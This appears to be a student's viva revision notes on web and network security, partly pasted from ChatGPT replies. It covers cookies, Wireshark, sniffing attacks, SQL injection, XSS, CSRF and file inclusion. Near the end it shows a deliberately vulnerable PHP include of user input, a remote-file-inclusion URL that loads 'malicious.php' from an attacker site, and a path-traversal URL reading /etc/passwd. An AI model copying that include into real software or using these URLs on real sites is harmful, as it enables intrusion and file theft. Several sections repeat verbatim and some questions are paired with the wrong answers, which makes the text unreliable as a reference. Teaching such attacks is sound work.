Solution of Css - Viva QUESTIONS
Solution of Css - Viva QUESTIONS
Cookies:
o Cookies are small pieces of data stored by the web browser on
behalf of the web server.
o They are used to remember information about the user across
different sessions and web pages.
Usage in HTTP:
o Session Management: Cookies are used to manage user sessions,
keeping users logged in as they navigate through different pages.
o Personalization: Cookies store user preferences and settings to
personalize the browsing experience.
o Tracking: Cookies are used to track user behavior and activity on
the website for analytics and targeted advertising.
Packet Capture:
o Wireshark captures packets of data as they travel across the
network, allowing detailed analysis of network traffic.
Protocol Analysis:
o Wireshark can decode and display the contents of packets
according to the protocols being used, making it easier to identify
abnormal or malicious traffic patterns.
Filters:
o Users can apply filters to focus on specific types of traffic or to
exclude known benign traffic, making it easier to spot potential
issues.
Signatures and Patterns:
o By examining packet contents and patterns, users can identify
known signatures of malicious activity, such as specific payloads
or unusual port usage.
Statistics and Summaries:
o Wireshark provides various statistical tools to summarize captured
traffic, highlighting anomalies such as unusual traffic volumes or
unexpected IP addresses.
Suspicious IP:
o An IP address that exhibits behavior or characteristics associated
with malicious activity, such as:
Scanning multiple ports in a short period.
Known involvement in previous attacks or cyber threats.
Geographic location inconsistent with expected user
locations.
Associated with spam, phishing, or other malicious
activities.
How Hackers See Your IP:
o Direct Interaction:
When you visit a website, the server can see your IP address
as part of the communication process.
o Emails and Chat Applications:
Sending emails or messages can expose your IP address to
the recipient.
o Malware:
If your system is infected with malware, it can send your IP
address and other data to a hacker-controlled server.
o Social Engineering:
Hackers can trick users into revealing their IP address
through deceptive means, such as clicking on a link or
running a malicious script.
o Network Scanning:
Hackers use tools to scan networks and identify active IP
addresses and their corresponding devices.
Sniffing Attack:
o Sniffing is a type of network security attack where an attacker
intercepts and captures data packets traveling through a network.
This can be done using various tools and techniques to eavesdrop
on network traffic and potentially capture sensitive information
such as usernames, passwords, and other private data.
Passive Sniffing:
o Passive sniffing involves silently capturing and monitoring
network traffic without altering it. This is typically done on
networks that use a hub or on a broadcast medium where traffic is
visible to all connected devices.
Active Sniffing:
o Active sniffing involves actively injecting traffic into the network
to capture data. This can include techniques like ARP spoofing or
poisoning, where the attacker sends fake ARP messages to
associate their MAC address with the IP address of another device,
effectively intercepting traffic intended for that device.
Sniffing Tools:
o Wireshark: A widely-used network protocol analyzer that
captures and analyzes network traffic.
o tcpdump: A command-line packet analyzer that allows users to
capture and display packets being transmitted or received over a
network.
o Ettercap: A comprehensive suite for man-in-the-middle attacks on
LAN, which can intercept, log, and analyze traffic.
o Cain & Abel: A password recovery tool for Microsoft Operating
Systems that can also perform network sniffing.
o Network Miner: A network forensic analysis tool (NFAT) that
can detect operating systems, sessions, hostnames, open ports, etc.,
without putting any traffic on the network.
IP Address Sniffing:
o IP address sniffing involves intercepting and capturing data packets
to discover the IP addresses of devices on a network. By
monitoring the traffic, an attacker can determine the IP addresses
being used and potentially identify the network's structure and
active devices. This information can be used for further network
attacks, such as IP spoofing or targeted attacks on specific devices.
Sniffing Attack:
o Sniffing is a type of network security attack where an attacker
intercepts and captures data packets traveling through a network.
This can be done using various tools and techniques to eavesdrop
on network traffic and potentially capture sensitive information
such as usernames, passwords, and other private data.
Passive Sniffing:
o Passive sniffing involves silently capturing and monitoring
network traffic without altering it. This is typically done on
networks that use a hub or on a broadcast medium where traffic is
visible to all connected devices.
Active Sniffing:
o Active sniffing involves actively injecting traffic into the network
to capture data. This can include techniques like ARP spoofing or
poisoning, where the attacker sends fake ARP messages to
associate their MAC address with the IP address of another device,
effectively intercepting traffic intended for that device.
HTTP Sniffing:
o HTTP sniffing refers to intercepting and capturing HTTP traffic,
which is the data exchanged between web browsers and web
servers. This can include capturing URLs, cookies, form
submissions, and any other data sent over HTTP. Since HTTP is
not encrypted, the data is easily readable by anyone who can
capture the traffic.
IP Address Sniffing:
o IP address sniffing involves intercepting and capturing data packets
to discover the IP addresses of devices on a network. By
monitoring the traffic, an attacker can determine the IP addresses
being used and potentially identify the network's structure and
active devices. This information can be used for further network
attacks, such as IP spoofing or targeted attacks on specific devices.
4o
Viva Questions: 1 What is SQL injection in DVWA? 2. Why is it called SQL
injection? 3. What is SQL command? 4. Which tool is used for SQL injection
attack? 5. What is the weakness of SQL injection?
ChatGPT
Sure! Here are the answers to your viva questions related to SQL injection:
SQL Command:
o An SQL command is a statement written in Structured Query
Language (SQL) used to perform tasks such as querying, updating,
inserting, or deleting data from a database. Examples of SQL
commands include:
SELECT: Retrieves data from one or more tables.
sql
code
SELECT * FROM users;
sql
code
INSERT INTO users (username, password) VALUES
('user1', 'pass1');
sql
code
UPDATE users SET password = 'newpass' WHERE
username = 'user1';
sql
code
DELETE FROM users WHERE username = 'user1';
Reflective XSS:
o Reflected XSS occurs when malicious scripts are injected through
input fields (e.g., URL parameters, form submissions) and
immediately reflected back by the server in the response. The script
is executed in the browser of the user who clicks on a crafted link
or interacts with the malicious input.
5. Are all web applications vulnerable to XSS attacks? Why or why not?
Certainly! Here are the answers to your viva questions related to Cross-Site
Request Forgery (CSRF):
1. What is CSRF?
php
code
<?php include($_GET['file']); ?>
If file is a URL, the server might include and execute remote code:
php
code
http://vulnerable-site.com/index.php?file=http://attacker-
site.com/malicious.php
10. Differentiate between local file inclusion and remote file inclusion?
php
code
http://vulnerable-site.com/index.php?file=../../../../etc/passwd
php
code
http://vulnerable-site.com/index.php?file=http://attacker-
site.com/malicious.php
Sure! Here are the answers to your viva questions related to dictionary and brute
force attacks: